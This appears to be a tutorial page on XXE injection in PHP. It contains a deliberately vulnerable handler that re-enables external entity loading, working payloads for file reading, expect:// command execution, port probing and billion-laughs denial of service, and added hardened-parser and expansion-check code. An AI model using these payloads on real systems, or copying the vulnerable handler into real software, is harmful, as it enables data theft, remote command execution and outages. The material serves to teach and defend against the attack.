XXE

Extensible Markup Language (XML) is a markup language derived from the Standard Generalized Markup Language (SGML) by simplifying and modifying it. Closely related technologies include the Extensible Stylesheet Language (XSL), XBRL and XPath.


XML is designed to transport and store data; its focus is the content of the data. HTML is designed to display data; its focus is the appearance of the data.

When a parser is allowed to reference external XML documents, an attacker can craft an XML document with malicious content to achieve file reads, command execution, port scanning, denial of service (DDoS) and similar attacks.

In PHP, calling libxml_disable_entity_loader with true forbids the loading of external XML documents.

PHP source

<?php
    // Deliberately vulnerable handler: external entity loading is explicitly re-enabled.
    libxml_disable_entity_loader(false);
    // The raw request body is taken as the XML document.
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    // LIBXML_NOENT substitutes entity references and LIBXML_DTDLOAD loads the DTD;
    // both are needed for the payloads below to take effect.
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    // Echoing the element prints its text content, i.e. the expanded entity.
    echo $creds;
?>
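The hardened counterpart of the handler above, as an added example rather than code from the original page. It applies the mitigation the text describes (libxml_disable_entity_loader(true)) and adds the checks a practitioner would want around it: any document carrying a DTD is rejected before parsing, because every payload on this page (external entity or internal-entity amplification) needs a <!DOCTYPE>, which libxml_disable_entity_loader alone does not prevent; LIBXML_NOENT and LIBXML_DTDLOAD are not passed; and LIBXML_NONET forbids network access during the parse. The helper name parse_untrusted_xml and the sample inputs are this example's own; everything else is the standard PHP libxml and DOM API. Note that on PHP 8.0 and later libxml_disable_entity_loader is deprecated, since libxml 2.9 already disables external entity loading by default.

```php
<?php
// Hardened counterpart to the vulnerable handler above. Added example, not code
// from the original page; parse_untrusted_xml is this example's own name.

/**
 * Parse XML from an untrusted source without resolving any entity.
 * Returns the DOMDocument, or null with $reason set when the input is rejected.
 */
function parse_untrusted_xml(string $xml, ?string &$reason = null): ?DOMDocument
{
    if (trim($xml) === '') {
        $reason = 'empty body';
        return null;
    }

    // 1. Reject any document that carries a DTD at all. Every payload on this
    //    page, external entity or "lol" amplification, needs a <!DOCTYPE>.
    if (stripos($xml, '<!DOCTYPE') !== false || stripos($xml, '<!ENTITY') !== false) {
        $reason = 'DTD / entity declarations are not accepted';
        return null;
    }

    // 2. Defence in depth: switch off the external entity loader for this parse.
    //    This is the knob the text refers to. On PHP >= 8.0 the function is
    //    deprecated because libxml >= 2.9 already defaults to "disabled".
    $prevLoader = null;
    if (PHP_VERSION_ID < 80000) {
        $prevLoader = libxml_disable_entity_loader(true);
    }
    $prevErrors = libxml_use_internal_errors(true);  // collect errors instead of warnings

    $dom = new DOMDocument();
    // 3. No LIBXML_NOENT, no LIBXML_DTDLOAD. LIBXML_NONET additionally forbids
    //    any network access during parsing, should a DTD ever get this far.
    $ok = $dom->loadXML($xml, LIBXML_NONET);

    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($prevErrors);
    if ($prevLoader !== null) {
        libxml_disable_entity_loader($prevLoader);
    }

    if ($ok === false) {
        $reason = $errors ? trim($errors[0]->message) : 'malformed XML';
        return null;
    }
    return $dom;
}

// Constructed inputs shaped like the page's payloads (the file path is a placeholder).
$samples = [
    'benign'          => '<?xml version="1.0"?><abc>hello</abc>',
    'external-entity' => '<?xml version="1.0"?><!DOCTYPE abc [<!ENTITY xxe SYSTEM "file:///placeholder/path">]><abc>&xxe;</abc>',
    'amplification'   => '<?xml version="1.0"?><!DOCTYPE abc [<!ENTITY lol "lol"><!ENTITY lol1 "&lol;&lol;">]><abc>&lol1;</abc>',
    'undeclared-ref'  => '<?xml version="1.0"?><abc>&xxe;</abc>',
];

foreach ($samples as $name => $xml) {
    $why = null;
    $dom = parse_untrusted_xml($xml, $why);
    echo str_pad($name, 17), $dom
        ? 'accepted: ' . $dom->documentElement->textContent
        : "rejected ($why)", "\n";
}
```

Only the first sample is accepted. The two DTD-carrying samples are refused by the string check before libxml ever sees them, and the last one fails well-formedness (an entity reference with no declaration) and is reported through libxml_get_errors rather than as a PHP warning. The previous loader and error-handling state is restored on every path, so the function is safe to call from code that relies on different settings elsewhere in the same process.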

Payloads (each is sent as the request body that the handler above reads from php://input)

----------------------- Arbitrary file read -----------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=<absolute path of target file>" > ]>
<abc>&xxe;</abc>

<?xml version="1.0"?>
<!DOCTYPE abc [  <!ENTITY xxe SYSTEM "file:///<absolute path of target file>" > ]>
<abc>&xxe;</abc>

------------------------ Command execution --------------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [  <!ENTITY xxe SYSTEM "expect://<system command>" > ]>
<abc>&xxe;</abc>

------------------------ Port probing --------------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [  <!ENTITY xxe SYSTEM "http://127.0.0.1:80" > ]> 
<abc>&xxe;</abc>

------------------------- DDoS (entity amplification, "billion laughs") ----------------------------------
<?xml version="1.0"?> 
<!DOCTYPE abc [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]> 
<abc>&lol9;</abc>
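The amplification payload above is dangerous because each level references the previous one ten times, so the text grows geometrically while the request itself stays tiny. The following added example (not code from the original page) estimates the expanded size of such a document without expanding it, which is the check a defender would run before parsing or use as a detection rule over request logs. The names estimate_entity_expansion and text_size and the 1 MB budget are this example's own assumptions; the lol payload is reconstructed inline from the one shown on this page. Modern libxml2 builds also enforce their own entity amplification limits (relaxed by LIBXML_PARSEHUGE), so this is defence in depth rather than the only line.

```php
<?php
// Added example, not from the original page: estimate the expanded size of an
// entity-amplification ("billion laughs") document without expanding it, so a
// request can be rejected, or flagged in logs, before it reaches the parser.
// estimate_entity_expansion, text_size and the budget are this example's own.

const EXPANSION_BUDGET_BYTES = 1000000;  // assumed policy value: 1 MB of expanded text

/**
 * Expanded byte length of $text once every &name; reference is substituted.
 * Returns PHP_INT_MAX on a reference loop or integer overflow.
 */
function text_size(string $text, array $defs, array &$memo, array $visiting): int
{
    // Bytes of literal text, i.e. everything except the references themselves.
    $size = strlen(preg_replace('/&\w+;/', '', $text));
    preg_match_all('/&(\w+);/', $text, $refs);
    foreach ($refs[1] as $name) {
        if (!isset($defs[$name])) {          // builtin (&amp;) or undeclared: counted as-is
            $size += strlen("&$name;");
            continue;
        }
        if (isset($visiting[$name])) {       // a -> b -> a would never terminate
            return PHP_INT_MAX;
        }
        if (!isset($memo[$name])) {
            $memo[$name] = text_size($defs[$name], $defs, $memo, $visiting + [$name => true]);
        }
        if ($memo[$name] === PHP_INT_MAX || $size > PHP_INT_MAX - $memo[$name]) {
            return PHP_INT_MAX;
        }
        $size += $memo[$name];
    }
    return $size;
}

/**
 * Expanded size of the document body (everything after the internal DTD subset).
 */
function estimate_entity_expansion(string $xml): int
{
    $defs = [];
    // Internal general entity declarations: <!ENTITY name "value">, the
    // double-quoted form used by the payload on this page.
    preg_match_all('/<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>/', $xml, $m, PREG_SET_ORDER);
    foreach ($m as $decl) {
        $defs[$decl[1]] = $decl[2];
    }
    // Body = text after the "]>" that closes the internal subset, else the whole input.
    $end = strrpos($xml, ']>');
    $body = $end === false ? $xml : substr($xml, $end + 2);
    $memo = [];
    return text_size($body, $defs, $memo, []);
}

// The page's own payload, reconstructed here: lol, then lol1..lol9, tenfold per level.
$dtd = '<!ENTITY lol "lol">';
for ($i = 1; $i <= 9; $i++) {
    $prev = $i === 1 ? 'lol' : 'lol' . ($i - 1);
    $dtd .= sprintf('<!ENTITY lol%d "%s">', $i, str_repeat("&$prev;", 10));
}
$lolz = '<?xml version="1.0"?><!DOCTYPE abc [' . $dtd . ']><abc>&lol9;</abc>';

// A constructed benign document that uses an internal entity legitimately.
$benign = '<?xml version="1.0"?><!DOCTYPE abc [<!ENTITY co "Example Co">]><abc>&co;</abc>';

foreach (['benign' => $benign, 'billion-laughs' => $lolz] as $name => $doc) {
    $bytes = estimate_entity_expansion($doc);
    printf("%-15s %s (%s)\n", $name,
        $bytes === PHP_INT_MAX ? 'loop or overflow' : "$bytes bytes",
        $bytes > EXPANSION_BUDGET_BYTES ? 'REJECT' : 'ok');
}
```

For the benign document the estimate is 21 bytes (the "<abc></abc>" wrapper plus the 10-byte entity value) and it passes; for the reconstructed payload the estimate is 3 x 10^9 bytes plus the wrapper, roughly 3 GB from a request of a few hundred bytes, and it is rejected. Memoising each entity's size keeps the estimate linear in the number of declarations, so the check itself cannot be turned into the amplification it is meant to catch, and the visiting set guards against mutually recursive declarations that libxml would reject anyway.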